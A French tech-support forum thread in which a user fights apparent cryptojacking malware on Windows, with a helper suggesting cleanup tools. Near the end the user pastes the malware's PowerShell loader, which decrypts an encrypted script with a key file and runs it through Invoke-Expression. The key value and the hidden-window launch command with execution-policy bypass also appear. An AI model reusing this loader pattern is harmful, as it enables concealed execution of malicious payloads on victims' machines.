Fenetre power shell

Bonjour, je viens de voir une video sur tik tok qui parle de cryptojacking. les fichiers sont dans C:/Windows: mid.bin, key, mid.ps1 et Dlhost.exe Le virus s'installe suite à une conversion mp3 en ligne.

Salut,

Tu peux analyser et supprimer des programmes nuisibles et virus avec RegRun Reanimator

https://greatis.com/security/reanimator.html

> Fix Problems

> Fix Malware Issues

Il faut regarder dans les onglets en haut pour les types d'items vus.

Attention, il est important de bien trier, par recherches et déductions et/ou analyses VirusTotal* pour ne supprimer que des virus ou inutiles, parce qu'il détecte tout et n'importe quoi, bon ou pas, important ou pas, ce n'est pas un "antivirus", mais plutôt un outil d'analyse qui permet de voir des détails techniques sur des éléments possiblement actifs, des fois bons, des fois mauvais.

Il montre des détails comme les types, les noms et la localisation des fichiers etc. ce qui sert des indices souvent concrets.

Que ce soit marqué en rouge, jaune, bleu ou vert, c'est l'utilisateur/utilisatrice qui doit juger de la pertinence de ce qu'il détecte.

Cocher les items à supprimer et non les autres et cliquer sur le bouton rouge, dans toutes les sections ou il y a à supprimer, puis aller à Finish! et cliquer le bouton pour redémarrer Windows.

Si il ne détecte pas assez tu peux utiliser le bouton Filter Set ou le Inspection Mode pour tout voir.

Ou On-Line Multi-Antivirus Scan

Ou en fermant la première fenêtre de Reanimator par le X en haut à droite, et l'onglet Reanimator > Anti Spyware Full Check...

-----------------------------------------------------­------------------------­-----------------------------------------------

Le programme VirusTotal Uploader *Download the App here*

https://support.virustotal.com/hc/en-us/articles/115002179065-Desktop-Apps

Pour (Un fichier) > Clic droit > Envoyer vers > VirusTotal

(Afficher les fichiers cachés si il faut dans Affichage > Options > Affichage)

Pour avoir les résultats en direct en ligne d'analyses du fichier par une soixantaine de moteurs antivirus, en plus de l'onglet Détails pour voir si le fichier est signé et vérifié ou pas etc.

On peut utiliser l'option Reupload pour obtenir une nouvelle analyse du fichier en cas de fichier récent peu analysé.

-----------------------------------------------------­------------------------­-----------------------------------------------

Tu peux faire du ménage dans les éléments invalides et inutiles en démarrage avec Autoruns

Tu peux télécharger Autoruns ici, extraire tout dans un nouveau dossier, et l'exécuter en tant qu'administrateur.

https://learn.microsoft.com/en-us/sysinternals/downloads/autoruns

Prends ton temps, regardes tous les détails, fais des recherches.

Dans les onglets "Logon" et "Scheduled Tasks", tu peux désactiver ou supprimer du démarrage automatique des éléments tiers inutiles pas de Microsoft ou Windows importants, soit en les décochant, ou par clic droit > Delete.

Regarder l'onglet "Services", mais ne pas les désactiver si parfois utiles, c'est mieux de les passer en mode "Manuel" (Pour démarrer à la demande) avec services.msc de Windows, par clic droit sur le bouton Démarrer > Exécuter: services.msc

Avec Autoruns tu as la liste des services Non Windows, alors ça aide.

Les changements seront pris en compte en redémarrant Windows.

Après dis nous, que tu aie encore besoin d'aide ou pas...

@+

Bonsoir, bien trouvé powershell suspect avec reanimator , mais si je le fix il s'arrête et se relance automatiquement quelques secondes après. Avec autoruns rien vu de suspect. Pour le reste ca dépasse mes compétences Merci

Tu as bien redémarré après le Fix ?

Il n'y a pas d'items suspects que tu n'as pas supprimé ?

Si tu veux que je regarde, malgré que c'est un peu compliqué, manque d'habitude de regarder avec des logs.

Démarres Reanimator

Cliques sur l'onglet Send Report > Make Report now

Quand une fenêtre Upload RegRunLog to Support Center s'ouvre, fermes la.

Envoies le rapport crée sur le bureau nommé regrunlog.txt sur le site cjoint.com https://www.cjoint.com/

Et fournis nous le lien en retour.

le voici https://www.cjoint.com/c/MHjrnjmjjwD

As tu désactivé des programmes non Windows avec Autoruns ? Tu as des tâches planifiées de programmes qui peuvent provoquer ça peut être. Je continue de visionner ton log.

Essaies de supprimer ce dosier C:\USERS\GILLE\APPDATA\LOCAL\CACHE\

Reanimator ne te l'indique pas ? (Dans Unwanted Files)

Tu peux afficher les dossiers cachés dans Affichage > Visualiser > Affichage.

Puis si tu n'as pas modifié ton fichier hosts toi même, utilises RSHosts pour restaurer ton fichier hosts

https://toolslib.net/downloads/viewdownload/15-rsthosts

Tu peux voir son contenu dans C:\Windows\Systrm32\Drivers\etc\hosts

Bonsoir ,rien de special dans host dossier cache supprimé mais pas de changement... je suppose que power shell est lancé pour réaliser une liste de commandes pas moyen de savoir quelles commande et lancé par quel programme ? Bonne soirée

Dana les sections Logon et Scheduled Tasks de Autoruns, décoches tout ce qui n'est pas de Microsoft ou Windows Ne touches pas à la section Installed Components de Logon, (J'ai Edge c'est tout) mais le reste.

PS: Ça peut venir de BITS

Supprimes la file d'attente de BITS avec ce programme

https://toolslib.net/downloads/viewdownload/21-winupdatefix/

Hello tout cela fait mais ca revient toujours... du coup j'ai recoché les entrées sur autoruns voila ce que me met reanimator https://www.cjoint.com/c/MHjuUumt6fD

C'est le processus du fichier légitime dans la section processus. C'est ce qui le démarre qu'il faudrait trouver. Pourrais tu photographier ton écran au démarrage qu'on voie si il y a de quoi écrit dans la fenêtre de PowerShell ?

Dans Reanimator, dans Read Report (L'équivalent de Anti Spyware Full Check) je vois:

C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.EXE" -ExecutionPolicy Bypass -WindowStyle Hidden -File C:\WINDOWS\mid.ps1

Tu peux trouver ce fichier caché ? C:\WINDOWS\mid.ps1

En affichant tes fichiers cachés + tes fichiers protégés dans l'explorateur ?

Dans Affichage > Options > Affichage

je l'ai trouvé et supprimé ca se lance toujours mais c'est sans doute fermé aussitot car je le vois plus dans la liste des taches en cours dans gestionnaire des taches et plus rien dans reanimator rien à voir dans fenetre power shell : https://www.cjoint.com/c/MHjvonpbzcD un peu pertubant parce que j'apercois la fenetre powershell qui n'arrete pas de se lancer à vitesse grand v toutes les 10 secondes (à peine visible) il y a aussi des fichiers mid.bin que je n'ai pas touché

mib.bin est un fichier légitime Je n'ai pas mid.bin par contre.

Tu peux l'analyser sur VirusTotal https://www.virustotal.com/gui/home/upload

Regardes avec Process Explorer ou encore mieux avec Process Monitor Trouvables ici

https://learn.microsoft.com/en-us/sysinternals/downloads/process-explorer

https://learn.microsoft.com/en-us/sysinternals/downloads/procmon

Tu peux ajouter un filtre dans Process Monitor

virus total m'annonce que mid.bin est safe...

Process Explorer ou Process Monitor t'ont-il aidé ?

J'espère, sinon je ne sais plus quoi:

Ça part ça, tu peux supprimer CCleaner partout dans Autoruns

En utilisant la case Filter

ben pas vraiment je sais pas m'en servir

voila ce que contient mid : function Decrypt-Script($encryptedScriptPath, $keyFileName) { if (-not (Test-Path $encryptedScriptPath)) { Throw "" } $keyFilePath = Join-Path -Path $env:windir -ChildPath ($keyFileName) if (-not (Test-Path $keyFilePath)) { Throw "" } $encryptedContent = Get-Content $encryptedScriptPath -Raw $key = Get-Content $keyFilePath -Raw $secure = $encryptedContent | ConvertTo-SecureString -Key (([int[]][char[]]$key)[0..15]) $script = [Runtime.InteropServices.Marshal]::PtrToStringAuto([Runtime.InteropServices.Marshal]::SecureStringToBSTR($secure)) return $script } $encryptedScriptPath = Join-Path -Path $env:windir -ChildPath "mid.bin" $keyFileName = "key" $decryptedScript = Decrypt-Script $encryptedScriptPath $keyFileName Invoke-Expression $decryptedScript J'ai tout remis et powershell se lance et reste actif donc revenu au point de départ... il y a quelque chose qui fait appel à Mid.ps1 sans arrêt

si je remets mid.ps1 sans key il se relance sans arrêt et ne reste pas actif si je mets key il se lance et reste actif en tache de fond key contient : q9ETwHj1uV9UEnKxtPRy ??